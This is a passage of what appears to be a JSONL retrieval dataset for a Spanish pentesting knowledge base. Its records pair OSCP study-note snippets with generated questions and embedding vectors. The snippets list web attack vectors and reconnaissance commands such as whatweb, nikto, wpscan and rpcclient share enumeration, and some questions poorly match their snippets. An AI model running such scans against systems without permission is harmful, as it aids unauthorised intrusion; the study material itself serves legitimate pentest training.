-0.02598, 0.01106, 0.03285, -0.08888, -0.0546, -0.01267, 0.11913, -0.04166, -0.01289, -0.04193, -0.03608, 0.02173, 0.08775, 0.07752, -0.04314, 0.0025, -0.05713, 0.03752, -0.08479, -0.04256, -0.11672, -0.16783, -0.06173, 0.0363, -0.10132, 0.06803, -0.04354, 0.13094, -0.05581, -0.03445, 0.10264, 0.00929, 0.01294, -0.03387, 0.05374, 0.0446, 0.10424, -0.03314, 0.08309, 0.07919, -0.09217, 0.07278, -0.05257, 0.09962, -0.00272, 0.06744, 0.0713, -0.02458, 0.01362, 0.05075, -0.04056, -0.05436, 0.1115, -0.08884, -0.05984, -0.06125, -0.12277, 0.00588, -0.12672, 0.02845, -0.04422, 0.02542, -0.01623, -0.04981, -0.0055, 0.04371, -0.06969, -0.04224, 0.04784, 0.00962, 0.05242, -0.11602, 0.07881, 0.0395, 0.03097, 0.07716, -0.07513, 0.09223, -0.04685, -0.01644, -0.04524, -0.11707, -0.03971, -0.11465, 0.05385, 0.00144, 0.004, 0.03853, -0.00842, -0.07382, -0.04801, 0.02567, -0.1166, 0.15927, -0.00634, 0.05526, 0.10769, 0.01471, 0.00162, -0.00442, -0.02634, -0.04769, 0.02148, -0.00152, -0.03927, 0.02594, 0.09349, 0.04367, 0.01783, -0.09727, 0.01439, -0.00654, 0.00714, 0.08551, -0.07603, 0.02968, -0.07405, -0.06181, 0.02132, -0.11874, 0.01689, -0.01581, -0.02917, -0.05826, 0.05419, 0.01556, -0.00621, -0.06824, -0.04423, -0.05202, 0.00978, 0.00937, 0.03192, -0.03705, 0.03059, -0.04092, 0.01014, 0.05665, 0.01551, -0.01228, 0.07657, 0.03457, -0.08787, -0.02049, -0.05005, -0.08989, -0.1319, 0.06808, -0.0167, -0.04587, -0.03248, -0.01034, 0.03906, -0.04342, -0.03477, -0.02259, -0.00011, -0.03172, 0.05331, 0.06431, 0.0258, -0.01396, 0.05112, 0.05233, 0.01529, -0.04564, 0.02093, 0.00239, -0.0155, -0.06701, 0.03553, 0.03292, -0.03845, -0.0633, 0.03946, 0.03509, -0.03073, 0.03167, 0.03692, 0.02914, 0.00843, 0.05819, -0.08497, -0.08751, 0.01775, 0.03317, -0.01654, -0.01912, -0.02885, 0.05489, 0.02728, 0.03168, 0.04033, -0.0002, -0.02155, 0.01889, 0.00124, 0.02398, -0.02605, -0.0428, -0.06588, -0.00526, -0.0107, 0.03535, -0.08746, 0.00813, -0.04583, -0.0764, -0.05491, -0.00164, 0.11534, 0.01184, -0.02225, 0.0096, -0.05963, -0.12007, -0.03533, -0.04307, -0.09632, -0.02742, -0.02941, 0.02283, -0.02739, 0.03422, -0.01046]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "cual es una alternativa libre a nikto para hacer escaneo de vulnerabilidades?", "v": [-0.12617, -0.02218, -0.17699, 0.07082, -0.09199, -0.03502, -0.08292, -0.10198, -0.14394, -0.04202, -0.03035, -0.16576, -0.10827, -0.01157, 0.03263, 0.01545, 0.02584, -0.06409, 0.15267, 0.12241, -0.15403, -0.03726, -0.04123, -0.02613, -0.03238, -0.00303, -0.09526, 0.08955, -0.03703, -0.01336, -0.05696, 0.00718, 0.0826, -0.00709, 0.01765, 0.12046, 0.18204, -0.02346, 0.12859, 0.01714, 0.05536, -0.01636, -0.08176, -0.03403, 0.015, -0.11169, -0.11674, -0.00962, 0.01665, 0.08211, -0.09278, -0.01387, -0.13955, -0.04578, 0.0908, -0.02952, 0.18698, -0.1031, -0.02668, -0.06313, -0.16442, 0.1286, 0.1135, -0.03089, -0.0189, -0.01031, -0.05495, 0.03968, -0.09861, 0.14198, 0.04435, -0.0279, 0.02436, -0.00427, -0.10328, 0.00861, -0.10069, -0.04209, -0.05695, 0.04562, 0.00088, -0.00558, 0.01186, 0.02633, -0.16193, -0.09369, 0.11275, -0.05121, 0.00709, 0.03451, 0.13621, 0.02327, -0.02298, 0.04995, 0.04201, -0.07796, 0.09368, 0.07277, -0.03858, 0.05425, 0.02071, -0.00876, -0.10091, 0.0782, 0.06615, 0.02741, -0.05337, 0.0452, -0.08641, 0.02704, -0.0459, 0.06099, -0.04139, -0.0286, 0.00243, 0.00293, -0.03265, 0.0193, 0.06062, 0.04559, -0.0468, -0.0904, -0.05997, -0.06565, 0.00826, 0.05352, 0.03705, 0.00917, -0.01918, 0.03991, 0.05167, -0.03909, -0.09564, -0.05198, -0.08138, -0.03908, 0.09054, -0.10826, 0.00175, -0.00316, 0.01501, 0.03117, 0.02269, -0.00717, -0.02987, 0.02895, 0.03335, -0.04981, -0.04227, 0.00067, -0.01912, 0.0221, -0.08751, 0.10549, -0.04605, -0.01568, -0.06385, 0.02264, -0.00634, 0.11346, 0.05093, 0.04146, -0.01824, 0.10343, -0.01716, -0.03629, 0.05091, -0.03345, -0.06954, -0.01128, 0.00961, 0.11421, 0.07392, -0.05868, 0.063, -0.05962, 0.01563, -0.09528, -0.00636, -0.04856, 0.02365, 0.02044, -0.04046, 0.00499, 0.01783, -0.01573, 0.02483, 0.02301, 0.05402, 0.0503, -0.03798, -0.02039, -0.06035, -0.04669, -0.02629, 0.00691, 0.02469, -0.06492, -0.02594, -0.0208, -0.11719, -0.01693, -0.04511, -0.05182, 0.02357, 0.027, -0.03008, -0.02301, 0.01315, 0.08531, 0.02416, 0.02447, 0.08249, -0.01005, -0.03715, -0.00367, 0.00636, 0.0305, -0.00604, -0.03373, -0.0221, -0.01702, 0.02636, 0.01395, -0.02048, 0.03937, 0.01543, -0.01433, -0.02391, 0.02196, 0.02848, -0.04037, -0.01254, -0.00152, 0.02805, 0.00402, 0.00333, 0.03584, 0.01103, -0.00184, 0.03982, 0.03765, -0.0363, -0.01533, -0.02017, -0.02957, -0.05492, 0.0295, -0.04382, -0.0526, -0.03933, 0.02752, 0.01316, -0.02977, 0.03402, -0.05735]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que herramientas me sirven para realizar inyecciones SQL en una aplicaciΓ³n web", "v": [-0.10269, 0.07663, -0.0717, -0.21915, 0.08743, -0.28953, -0.15128, -0.13723, 0.06639, 0.03024, -0.18477, -0.14895, 0.05361, -0.14966, -0.01554, 0.06527, -0.00381, -0.18969, -0.02447, 0.06397, 0.05418, 0.06563, -0.05167, -0.00412, -0.13933, 0.05619, 0.07964, 0.00869, -0.13617, -0.01765, -0.05998, 0.00142, -0.00473, 0.0215, -0.02218, -0.09663, -0.02613, 0.03735, -0.05341, -0.0712, 0.01052, -0.06068, -0.22842, 0.03918, -0.01752, 0.06478, 0.06647, 0.00624, -0.07174, 0.05933, -0.092, -0.09344, -0.12395, -0.02439, -0.0488, -0.05662, 0.12277, -0.0966, 0.06318, -0.01203, -0.15783, -0.02547, -0.02083, 0.04594, 0.02612, -0.00782, 0.03944, 0.01324, -0.05583, 0.11021, -0.07363, 0.02517, -0.015, -0.03431, 0.01601, -0.04421, 0.02192, 0.04447, 0.00387, -0.05622, -0.07625, 0.00358, -0.11757, 0.09018, 0.012, -0.0201, 0.13578, 0.01086, 0.09365, -0.10726, 0.03542, 0.02436, -0.0003, -0.00059, 0.00202, -0.03729, 0.04996, -0.05007, 0.05146, 0.03274, 0.05048, -0.09502, -0.00172, 0.06072, -0.01987, 0.07044, 0.05974, -0.00256, -0.11756, -0.02695, 0.05742, -0.03661, -0.03593, -0.00078, 0.013, 0.04967, -0.00657, -0.01892, -0.0439, -0.04285, -0.02176, 0.02339, -0.03831, -0.00219, 0.00389, -0.03419, -0.03448, 0.02058, -0.05131, -0.02514, 0.00755, -0.06653, -0.12189, -0.01437, 0.00195, -0.00153, 0.03236, -0.1064, -0.01976, -0.03819, -0.01456, -0.05821, -0.09032, -0.01592, 0.07242, -0.02282, 0.01142, 0.01793, -0.03695, -0.0126, 0.04195, -0.1076, -0.02065, 0.02469, -0.07821, -0.04722, -0.00221, -0.03561, -0.07855, -0.01803, -0.02708, -0.01217, 0.0147, -0.00588, -0.03571, -0.04168, 0.00364, -0.01062, 0.07889, 0.01193, 0.05531, 0.06444, 0.06045, -0.07441, 0.02943, 0.00321, -0.06493, -0.00567, 0.05489, -0.0774, -0.00137, -0.04786, 0.00505, 0.01625, 0.04501, -0.0411, 0.01333, 0.00015, -0.04099, 0.0078, -0.01302, 0.03075, 0.00131, -0.04318, 0.0946, 0.02397, -0.01012, -0.04849, 0.01716, -0.02702, -0.05375, -0.0613, -0.07266, -0.08002, -0.00369, 0.05917, -0.03141, 0.04116, -0.02681, -0.00529, -0.01098, 0.01586, 0.04193, 0.01695, 0.04265, -0.08282, 0.06398, 0.04346, 0.00362, -0.02136, -0.02822, -0.00061, 0.04182, -0.02634, -0.02778, 0.02478, 0.01481, -0.0466, -0.00043, 0.02515, 0.03012, -0.06406, -0.02753, -0.02318, 0.02239, -0.03435, 0.00502, -0.06754, -0.04831, -0.03633, 0.00356, 0.05903, 0.04225, 0.05025, -0.0356, -0.03628, -0.05326, -0.00654, -0.06086, -0.02836, -0.04946, -0.04161, 0.03332, 0.036, 0.01262, -0.01101]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "cual programa puedo usar para hacer un ataque de subida de archivos evadiendo filtros", "v": [0.03778, 0.02449, -0.12999, -0.1283, 0.00926, -0.06874, -0.01505, -0.09063, -0.06963, -0.05453, -0.06288, -0.19496, -0.04658, -0.03007, -0.11902, -0.07356, 0.1113, -0.01958, 0.11007, -0.06338, 0.02024, 0.03999, 0.00411, -0.16607, -0.05784, 0.04017, 0.02752, 0.15569, -0.09038, -0.13676, 0.00026, 0.06516, 0.0794, 0.01066, 0.0113, -0.06673, 0.03351, 0.04818, 0.02849, 0.02611, -0.0257, 0.03277, -0.16226, -0.10061, 0.03801, -0.07524, 0.07033, -0.01341, 0.04028, -0.04717, 0.04243, 0.01264, -0.05251, -0.06525, -0.05163, -0.1066, 0.00252, -0.17079, -0.05465, -0.00216, -0.03261, 0.09232, 0.01278, -0.02602, -0.0389, -0.11735, -0.02943, 0.04094, -0.09701, 0.01245, 0.01264, 0.04501, 0.00498, 0.02293, -0.00168, 0.03814, 0.02635, -0.04483, -0.0043, -0.01657, -0.05886, 0.01453, -0.00497, 0.05954, -0.17082, -0.08141, 0.05806, -0.09201, -0.09807, -0.0197, 0.0126, -0.05784, 0.02633, 0.00919, 0.01462, -0.07861, 0.06781, -0.05168, -0.00401, 0.02966, 0.06364, -0.15854, -0.03827, 0.24084, 0.05712, 0.08167, -0.00953, 0.00701, -0.04981, -0.06116, 0.03478, -0.0524, -0.08545, -0.02299, -0.0559, 0.01742, -0.03849, -0.06652, 0.0072, -0.08405, -0.04891, 0.04756, -0.01986, -0.00663, 0.10806, 0.00293, 0.03988, 0.04778, -0.12452, 0.077, -0.00386, 0.09753, 0.02173, -0.05076, -0.13318, -0.02197, 0.04971, -0.04491, -0.01804, -0.03197, 0.04324, 0.10134, -0.04236, 0.05379, 0.05493, 0.04958, -0.0555, -0.04787, -0.09209, -0.00719, 0.02955, -0.04342, 0.01203, 0.06336, 0.00912, -0.00607, 0.05931, -0.12828, -0.10266, 0.12458, -0.03413, 0.02069, -0.06093, 0.0671, 0.07434, -0.05119, 0.07251, -0.01667, 0.02866, -0.00264, 0.02041, 0.04025, 0.02091, -0.12993, 0.0651, -0.01093, -0.03752, -0.05942, 0.05028, -0.01848, -0.00214, 0.0139, 0.0269, 0.01778, -0.04313, -0.00371, 0.03292, 0.03401, -0.00453, 0.01646, -0.11633, -0.00093, -0.06409, -0.01419, 0.00504, -0.06848, -0.02103, 0.04202, 0.01121, -0.02471, -0.00504, -0.02353, -0.06959, -0.02165, 0.06226, 0.02719, -0.0117, -0.04613, 0.10102, 0.08481, -0.05222, -0.03025, 0.09443, -0.04204, -0.05081, 0.03907, -0.00772, 0.06301, 0.08359, 0.00611, 0.00533, 0.01943, 0.02592, 0.09083, -0.01723, -0.03375, -0.00672, -0.09128, -0.00698, 0.0121, -0.07282, -0.0568, 0.00532, -0.03636, -0.00236, 0.00055, 0.00888, 0.0282, -0.06672, -0.02873, -0.01147, 0.06296, 0.03354, -0.01627, -0.03656, -0.0314, -0.04205, 0.02628, 0.00323, -0.01514, -0.00163, 0.03338, -0.0199, -0.01293, 0.0837, 0.05327]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Vectores tΓ­picos\nTodos en Hacking web: SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE Β· File upload bypass Β· XSS Β· SSTI Β· Authentication attacks.\n\nRelacionado: Content discovery Β· Trampas de enumeraciΓ³n Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con que tΓ©cnica puedo explorar el contenido de una web y encontrar recursos pΓΊblicos sin saberlo", "v": [-0.08326, 0.03023, -0.18295, -0.22511, 0.09692, -0.1107, 0.00235, -0.05095, -0.0178, -0.14381, -0.0843, -0.04852, 0.05961, -0.04144, 0.00437, 0.0599, 0.0978, -0.11288, 0.11109, -0.03674, 0.00629, -0.07726, -0.14544, 0.0269, -0.03374, -0.09495, -0.00587, -0.07844, 0.00374, 0.00428, -0.03563, 0.13605, 0.01734, 0.01629, -0.09082, 0.04103, 0.16399, 0.07372, -0.15057, -0.07665, -0.02967, -0.02403, -0.07956, 0.04515, -0.02434, -0.05131, -0.01034, -0.06565, -0.06598, -0.00898, -0.06252, 0.00139, -0.1978, -0.06278, -0.03241, -0.06793, 0.12392, -0.03261, -0.02758, -0.0534, -0.10676, -0.03239, -0.0247, -0.05302, 0.01777, -0.01955, 0.05289, 0.15953, -0.10282, 0.03143, 0.01219, -0.02441, 0.04087, -0.00668, -0.04382, 0.07566, -0.04349, -0.01765, 0.05406, -0.02396, -0.04926, 0.03416, -0.02273, -0.01288, -0.14183, -0.07873, 0.03827, -0.05987, 0.09554, -0.19681, 0.05877, 0.0716, -0.05742, -0.02648, -0.10367, 0.01721, 0.05189, -0.01721, -0.08274, 0.09428, 0.00122, -0.03895, -0.12016, 0.04485, 0.043, 0.09368, 0.07161, -0.03779, -0.05085, 0.00212, -0.06786, 0.01415, -0.06889, 0.02945, -0.0338, 0.0281, -0.03668, -0.04399, -0.04442, -0.05208, -0.07869, 0.017, -0.03283, -0.05722, 0.09133, -0.06502, 0.02995, -0.01077, 0.09561, -0.04589, 0.10724, 0.01639, -0.03558, -0.02273, 0.04676, 0.00054, 0.04874, -0.01289, -0.0072, -0.01495, -0.02871, -0.0343, -0.0427, 0.01598, 0.05747, -0.06618, 0.07895, -0.08803, -0.10499, -0.07855, -0.01717, -0.08514, 0.0251, 0.05967, -0.0016, 0.00225, 0.05574, 0.02016, -0.09293, 0.00341, -0.03208, 0.06225, -0.0477, -0.039, 0.00018, 0.02485, -0.14984, -0.04189, -0.0098, -0.03429, -0.05451, 0.07801, 0.02579, -0.07358, -0.00791, -0.0647, -0.04144, -0.08513, -0.02445, -0.03988, -0.05438, -0.07604, -0.02716, -0.00281, -0.00567, -0.06764, -0.01861, -0.04295, -0.06944, 0.00471, -0.01852, -0.04403, 0.00183, 0.05234, 0.01861, -0.06004, 0.02067, 0.01611, 0.01024, -0.00616, -0.03576, -0.01195, -0.01726, -0.06932, -0.04864, 0.00303, -0.03713, -0.03966, -0.06689, -0.02973, 0.09153, -0.02085, 0.08117, -0.07485, -0.03768, 0.06306, -0.00872, -0.03086, -0.10234, 0.04157, 0.00981, 0.04267, 0.04463, 0.0062, 0.09282, -0.06516, -0.01572, -0.00972, -0.02277, -0.01254, -0.01952, 0.00356, 0.01529, 0.02123, 0.06534, -0.01008, 0.02911, -0.01655, -0.04044, -0.00439, 0.01453, 0.05929, 0.00147, -0.02661, 0.00384, -0.03635, -0.0967, 0.00823, -0.03888, -0.05811, 0.01772, 0.00924, 0.02546, -0.00268, 0.01539, -0.02775]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Trampas de enumeraciΓ³n\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con GestiΓ³n del tiempo.", "indexar": "que tecnica sirve para evitar caer en enlaces de spam?", "v": [0.08054, 0.00181, -0.22231, -0.169, -0.04665, -0.24255, -0.02728, -0.13834, 0.02547, -0.02647, -0.06259, -0.02069, 0.01533, -0.19283, 0.11483, 0.10412, 0.04692, -0.04127, 0.13187, 0.05546, 0.01701, 0.00858, -0.04853, -0.01521, -0.06139, -0.01756, -0.07283, -0.03752, -0.18217, -0.06476, -0.04875, 0.06676, 0.05301, -0.00937, -0.03191, 0.13771, 0.12303, -0.051, 0.06774, 0.07093, 0.01487, -0.02986, -0.0955, 0.00373, -0.10579, -0.00674, -0.04323, -0.02369, 0.08993, -0.02467, -0.14989, 0.05558, -0.09875, -0.16393, -0.18828, -0.00224, 0.09295, -0.06019, -0.02558, -0.09153, 0.04612, 0.03056, 0.00028, 0.08326, -0.07199, -0.08602, 0.00449, -0.08416, -0.07989, 0.05577, 0.04132, 0.0168, 0.04741, -0.04328, -0.00029, -0.00172, 0.00636, 0.07153, -0.0385, 0.0083, 0.0579, -0.0876, 0.03076, -0.03114, -0.03193, -0.0662, 0.02283, 0.01997, -0.10593, -0.14521, 0.02609, 0.1427, 0.04272, 0.00162, -0.0264, -0.06698, -0.03305, -0.09949, 0.02541, 0.09215, 0.04881, -0.05457, -0.06409, 0.11057, -0.01035, 0.02342, 0.01883, -0.07333, 0.06314, -0.01789, -0.01827, 0.04464, -0.06574, -0.05993, -0.03695, -0.05305, -0.01104, -0.06813, -0.03185, -0.05211, -0.01605, -0.08428, -0.02626, 0.07494, -0.03462, -0.01565, 0.0326, 0.00148, 0.00559, 0.0184, -0.0812, 0.02876, -0.07089, -0.00448, -0.06545, 0.0427, 0.04367, -0.03753, -0.06235, -0.00121, 0.06355, 0.13792, -0.04532, -0.02655, -0.03783, 0.00771, 0.05642, -0.0493, -0.05421, -0.12682, 0.04603, 0.00122, 0.05127, 0.00992, 0.02678, -0.03023, 0.02253, -0.05178, 0.04463, 0.13471, 0.03197, 0.06817, 0.01874, 0.03687, -0.01227, 0.05519, 0.01116, 0.00756, -0.00966, 0.04663, -0.01543, 0.08794, -0.05577, -0.0978, -0.0037, 0.00284, 0.00857, 0.02737, -0.00707, -0.0592, -0.05132, -0.09116, -0.0229, 0.05959, 0.02636, 0.00171, 0.0489, -0.01615, 0.0436, 0.01569, -0.0137, -0.0439, -0.02755, 0.07467, -0.03398, -0.01769, -0.03661, -0.0699, 0.00987, -0.01783, 0.0105, -0.05203, 0.05383, 0.00873, -0.0148, 0.03, 0.0384, -0.11222, -0.05848, 0.02045, 0.07748, -0.02029, 0.01159, -0.06365, -0.04135, -0.0175, 0.0577, 0.00135, 0.02189, 0.0195, 0.02445, -0.01732, -0.00279, -0.05107, -0.01756, 0.01691, -0.0302, 0.00771, 0.02174, 0.03391, -0.01282, -0.00208, -0.0033, -0.00336, -0.00904, -0.05283, 0.00067, -0.00695, -0.01695, -0.0163, 0.01772, -0.02368, 0.0161, -0.04431, 0.05163, -0.0238, -0.11024, 0.00859, 0.01405, -0.07281, -0.00793, -0.01825, 0.02029, -0.01252, 0.00814, -0.00749]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Trampas de enumeraciΓ³n\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con GestiΓ³n del tiempo.", "indexar": "cual es una herramienta que me ayude a detectar trampas de enumeraciΓ³n", "v": [0.03537, 0.11657, -0.21526, -0.153, 0.11124, 0.05459, -0.07841, 0.08453, -0.08228, 0.08086, -0.11275, 0.02601, -0.0964, -0.02046, 0.07638, 0.07318, 0.05713, -0.06339, 0.15024, -0.04459, 0.047, -0.05879, -0.1209, 0.00695, -0.11692, -0.07388, -0.05117, -0.10984, -0.14067, -0.00756, -0.01045, 0.08133, 0.10542, -0.10573, -0.07811, -0.03957, -0.02358, -0.06927, 0.01246, 0.0746, 0.01333, -0.02809, -0.05736, -0.02478, -0.00805, 0.02621, -0.07225, -0.00102, 0.01115, 0.08718, -0.10573, -0.10503, -0.16313, -0.15508, -0.02368, -0.12828, 0.164, -0.05498, 0.06083, -0.15233, -0.07449, -0.00429, -0.04151, -0.03508, -0.05705, -0.03357, -0.00085, -0.1288, -0.05215, 0.02654, 0.09084, 0.03244, -0.00287, 0.00936, -0.028, -0.00924, 0.03654, 0.01028, 0.12274, -0.05302, 0.06108, -0.08623, -0.03698, 0.08653, -0.05628, -0.08506, 0.07851, 0.08296, 0.01905, -0.10138, 0.02236, 0.11694, 0.00372, 0.0797, 0.04559, -0.05774, 0.12693, -0.04219, 0.04374, 0.0271, 0.09274, -0.12826, -0.11616, 0.10609, -0.03246, 0.05317, -0.07103, -0.0006, -0.05722, -0.11806, 0.05644, -0.01003, 0.01859, -0.01001, -0.00774, 0.02432, 0.00555, 0.00538, 0.0011, -0.05163, -0.02367, 0.06035, -0.14517, -0.03225, 0.08621, -0.05442, -0.06392, 0.04562, 0.00557, -0.01666, 0.00044, -0.01925, -0.07092, -0.01286, -0.0228, 0.03591, 0.00788, -0.07936, 0.01537, 0.01475, 0.00285, 0.05297, -0.0426, -0.0981, 0.03512, 0.03427, -0.01292, -0.03179, -0.02148, 0.04179, 0.0036, -0.00517, 0.05001, 0.05781, 0.00219, 0.00431, 0.0379, 0.06695, -0.10473, 0.02414, -0.05232, -0.02368, 0.03786, -0.03714, 0.04033, -0.03873, 0.06955, 0.03126, 0.03332, 0.01539, -0.01413, -0.02354, 0.01665, 0.03518, -0.01612, -0.06341, -0.05064, 0.00531, -0.03888, -0.06806, -0.03962, 0.00676, -0.00832, -0.05933, 0.02393, -0.0179, -0.032, -0.01969, 0.0006, 0.07544, 0.06006, -0.00204, -0.04938, -0.07071, 0.03851, 0.03431, 0.03874, -0.02, 0.03673, -0.04232, -0.03766, -0.03281, -0.0332, -0.02183, 0.01663, 0.04087, -0.03417, -0.03207, 0.038, 0.01941, 0.08887, 0.01826, 0.0227, -0.04885, -0.03365, -0.02899, -0.04267, 0.04829, -0.0219, -0.02256, 0.01492, 0.02592, 0.10013, 0.0234, -0.07274, -0.01431, 0.013, 0.0754, 0.04135, 0.02643, -0.00172, -0.0559, 0.01522, -0.0516, -0.01101, -0.09183, 0.04172, -0.06418, -0.03994, -0.04052, 0.04028, 0.05642, 0.02474, -0.06018, -0.0235, -0.0036, -0.03336, -0.00818, -0.01839, -0.05548, -0.01508, -0.00084, 0.08875, -0.07528, 0.06505, -0.01812]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Trampas de enumeraciΓ³n\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con GestiΓ³n del tiempo.", "indexar": "con que puedo bloquear los enlaces de spam que gasta tanto tiempo?", "v": [0.1471, 0.13484, -0.1455, -0.05729, -0.10353, -0.06076, -0.01585, -0.14008, -0.11529, -0.05168, -0.02781, -0.04951, 0.00101, -0.04292, 0.0356, 0.08491, -0.01889, -0.0119, -0.01825, -0.02694, 0.05555, -0.11899, 0.01961, 0.03898, -0.06699, -0.08578, -0.00642, 0.01682, -0.20815, -0.05364, -0.05931, -0.10195, 0.03027, -0.1339, -0.00574, 0.07623, 0.15335, 0.00452, 0.13773, 0.0393, 0.07537, -0.02797, -0.04095, -0.06372, -0.13542, 0.00112, -0.03838, 0.05071, 0.01099, -0.04976, -0.15451, -0.02661, -0.13999, -0.07892, -0.09406, 0.0326, 0.16102, -0.05889, -0.08285, -0.00409, -0.00899, 0.04593, 0.07456, 0.09383, -0.06616, -0.00512, -0.00944, -0.02333, -0.04753, 0.05587, -0.04971, -0.02572, -0.01896, -0.01898, 0.07224, 0.03977, 0.02615, 0.06818, -0.00441, 0.0426, 0.01387, -0.1448, 0.04735, 0.00105, -0.05164, 0.01467, 0.00152, -0.03907, -0.08642, -0.09366, 0.03093, 0.10798, 0.00533, 0.09203, -0.09594, -0.02183, -0.00662, -0.02774, 0.0497, 0.0558, 0.04628, 0.0103, -0.05866, 0.12307, 0.05401, 0.02776, 0.04852, -0.07819, 0.08659, -0.03864, -0.07106, -0.04329, -0.04865, -0.152, 0.03098, -0.05582, -0.09014, -0.04745, -0.03596, -0.12736, -0.06122, -0.0458, -0.10642, 0.12023, 0.05901, -0.00055, 0.01868, 0.0045, 0.03624, -0.02384, -0.08844, 0.05737, -0.01275, -0.05062, -0.07708, 0.02835, -0.07312, 0.02127, 0.02272, -0.00923, 0.10279, 0.06609, 0.02878, 0.00683, 0.02238, -0.02129, -0.0296, -0.09944, -0.14271, -0.11836, -0.00424, -0.03675, 0.09017, 0.05056, 0.04973, 0.0186, -0.02341, -0.04017, 0.07478, 0.10949, -0.03992, 0.06155, -0.03171, 0.04456, -0.00141, -0.00011, -0.03331, 0.05169, -0.01805, 0.02909, -0.03421, 0.06388, -0.03959, -0.07579, -0.02351, -0.0322, 0.02492, 0.00263, 0.01096, -0.06297, -0.05879, -0.02023, -0.0833, 0.00721, -0.03746, 0.0252, 0.0466, 0.0066, 0.0129, 0.04609, 0.01913, 0.00214, 0.01316, 0.05773, -0.03213, -0.04594, -0.0582, -0.03808, 0.01175, -0.0594, 0.01342, -0.05348, 0.05094, -0.00452, -0.08402, 0.03697, -0.04398, 0.01455, -0.03898, 0.02674, 0.10272, -0.02992, 0.02155, -0.07329, -0.05209, 0.00884, 0.07872, -0.0509, -0.01289, 0.02867, 0.03375, 0.10938, 0.02219, -0.02814, -0.00101, -0.01032, 0.02604, 0.02812, 0.03384, 0.03469, -0.05219, -0.00052, -0.08245, -0.05602, 0.00347, -0.01135, 0.00623, -0.08968, -0.03015, -0.00562, 0.03752, 0.06092, 0.00332, -0.03987, -0.01013, -0.03657, -0.06912, 0.0319, -0.01322, -0.11685, -0.00576, 0.02491, 0.00998, 0.01215, 0.02936, -0.00903]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que programa me sirve para saber si una mΓ‘quina estΓ‘ realmente viva o solo muestra puertos abiertos falsos?", "v": [0.12205, 0.0341, -0.23092, -0.04625, -0.05587, -0.0906, -0.00611, -0.13676, -0.04655, -0.22151, 0.02454, -0.06855, 0.11969, -0.00935, 0.11899, -0.03876, 0.052, -0.07388, 0.10263, 0.04044, -0.04217, -0.07487, -0.09232, -0.17959, 0.02419, 0.09309, 0.00742, -0.03404, -0.16217, -0.00958, 0.10427, 0.03961, 0.07725, -0.10222, 0.06725, -0.08483, 0.03267, -0.03607, 0.1369, 0.05402, 0.17323, 0.01493, 0.02154, 0.06013, 0.07848, -0.07869, -0.02403, -0.08217, -0.01456, 0.09074, -0.04236, -0.03655, -0.03408, 0.09011, -0.06785, -0.14285, -0.01177, 0.01202, 0.00712, -0.03101, -0.03087, 0.04069, 0.03887, -0.05784, 0.03267, 0.0129, 0.09318, 0.02183, -0.04095, -0.05089, -0.08967, 0.01729, 0.03365, 0.00147, -0.11316, -0.08284, 0.02449, -0.03821, 0.07311, 0.01207, 0.02836, -0.02414, 0.0629, 0.03409, 0.02959, -0.04475, 